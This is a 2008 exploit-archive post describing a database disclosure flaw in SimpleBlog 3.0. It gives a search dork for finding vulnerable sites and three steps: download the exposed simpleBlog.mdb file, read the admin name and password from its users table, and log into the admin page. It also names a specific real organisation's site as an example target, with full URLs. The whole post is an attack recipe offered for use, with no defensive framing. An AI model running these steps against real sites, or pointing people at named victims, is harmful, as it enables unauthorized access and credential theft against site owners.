[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : SimpleBlog 3.0 (simpleBlog.mdb) Database Disclosure Vulnerability
# Published : 2008-11-25
# Author : EL_MuHaMMeD
# Previous Title : fuzzylime cms 3.03 (track.php p) Local File Inclusion Vulnerability
# Next Title : LoveCMS 1.6.2 Final (Download Manager 1.0) File Upload Exploit


[??] SimpleBlog 3.0 Mdb Vulnerability
[??]
[??] ----------------------------------------------------------
[??] Author : EL_MuHaMMeD
[??]
[??] Date : 26.11.2008
[??]
[??] Contact : cwelmuhammed@gmail.com
[??]
[??] -----------------------------------------------------------


Script : SimpleBlog 3.0

Download : http://www.8pixel.net/FetchFile.aspx?doc=simpleblog3.rar

Dork : "inurl:simpleblog3"

Our mdb path : db/simpleBlog.mdb

Exploits :

Step 1 - http://www.[target].com/[path]/simpleblog3/db/simpleBlog.mdb

Step 2 - Download that mdb file and read admin name & pass from "users" table.

Step 3 - http://www.[target].com/[path]/simpleblog3/admin/default.asp

Example :

http://www.bvrg.org.uk/simpleblog3/db/simpleBlog.mdb

http://www.bvrg.org.uk/simpleblog3/admin/default.asp

 

[??] ----------------------------------------------------------------------
[??]
[??] Cyber-Security.ORG - ELMuHaMMeD.COM
[??]
[??] ----------------------------------------------------------------------

# www.Syue.com [2008-11-25]